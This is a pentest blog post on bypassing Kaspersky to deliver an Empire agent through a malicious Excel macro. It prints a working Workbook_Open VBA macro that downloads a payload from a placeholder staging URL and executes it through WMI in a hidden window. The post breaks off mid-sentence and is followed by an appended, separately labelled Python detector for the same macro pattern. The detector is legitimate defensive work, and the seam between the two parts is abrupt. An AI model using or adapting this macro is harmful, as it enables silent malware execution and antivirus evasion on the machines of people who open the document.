Category: pentest

Bypassing Kaspersky to execute a malicious macro

I always heard bypassing AVs was really easy, so I wanted to see it for myself. The goal here was to get an Empire agent to execute through a malicious macro. AVs tend to dislike macros for good reasons, so I figured it would give me a good overview of the difficulty. Surprisingly, I couldn't find a working example anywhere. There is obviously a lot of AV evasion literature online, and even tools that claim to bypass AVs, but somehow I couldn't make them work to execute an Empire agent from a macro. I won't go too much into detail; I'll just point out the main techniques I used and where I got them from. So here it is:

    Private Sub Workbook_Open()
        ' Fetch the payload text from the staging URL
        Dim myURL As String
        myURL = "http://URL:PORT/PAYLOAD"
        Dim WinHttpReq As Object
        Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
        WinHttpReq.Open "GET", myURL, False
        WinHttpReq.send
        Dim payload
        payload = WinHttpReq.ResponseText
        If WinHttpReq.Status = 200 Then
            ' Run the fetched text as a command line through WMI, with a hidden window
            Const HIDDEN_WINDOW = 5
            strComputer = "."
            Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
            Set objStartup = objWMIService.Get("Win32_ProcessStartup")
            Set objConfig = objStartup.SpawnInstance_
            objConfig.ShowWindow = HIDDEN_WINDOW
            Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
            errReturn = objProcess.Create(payload, Null, objConfig, intProcessID)
        End If
    End Sub

The previous code is pretty…
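From the defender's side, the macro above has a recognisable shape: an auto-execute entry point, an HTTP fetch through a COM object, and process creation via WMI with a hidden window. The following static check over extracted VBA source is an added example, not code from the original post; it assumes the macro text has already been pulled out of the document (for instance with olevba), and the two sample macros are constructed for the demonstration.

```python
import re

# Indicator groups for the download-and-execute macro pattern discussed above.
# Input is VBA source text; no Office document is parsed here.
INDICATORS = {
    "autoexec": re.compile(r"\b(Workbook_Open|Auto_Open|Document_Open|AutoOpen)\b", re.I),
    "download": re.compile(r"Microsoft\.XMLHTTP|MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "wmi_exec": re.compile(r"winmgmts:|Win32_Process\b", re.I),
    "hidden_window": re.compile(r"\bShowWindow\b|SW_HIDE|HIDDEN_WINDOW", re.I),
}
URL_LITERAL = re.compile(r'"(https?://[^"\s]+)"', re.I)


def analyze_macro(vba_source: str) -> dict:
    """Report which indicator groups fire, URLs found in string literals, and a verdict.
    The verdict requires the whole chain (autoexec + download + WMI execution), so a
    macro that only runs at open, or only fetches data, does not trip it on its own."""
    hits = {name: bool(rx.search(vba_source)) for name, rx in INDICATORS.items()}
    urls = URL_LITERAL.findall(vba_source)
    suspicious = hits["autoexec"] and hits["download"] and hits["wmi_exec"]
    return {"hits": hits, "urls": urls, "suspicious": suspicious}


# Constructed sample: the essential lines of the macro from this post.
DOWNLOAD_EXEC_MACRO = r'''
Private Sub Workbook_Open()
    myURL = "http://URL:PORT/PAYLOAD"
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", myURL, False
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
    errReturn = objProcess.Create(payload, Null, objConfig, intProcessID)
End Sub
'''

# Constructed sample: a benign auto-open macro that only touches the workbook.
BENIGN_MACRO = r'''
Private Sub Workbook_Open()
    Sheets("Summary").Range("A1").Value = "Opened " & Now
End Sub
'''

if __name__ == "__main__":
    for label, src in (("download-exec", DOWNLOAD_EXEC_MACRO), ("benign", BENIGN_MACRO)):
        print(label, analyze_macro(src))
```

The benign sample shows why the verdict is tied to the full chain rather than to `Workbook_Open` alone: auto-open handlers are common in legitimate workbooks, while the combination with an HTTP client object and `Win32_Process` is what matches the technique in this post.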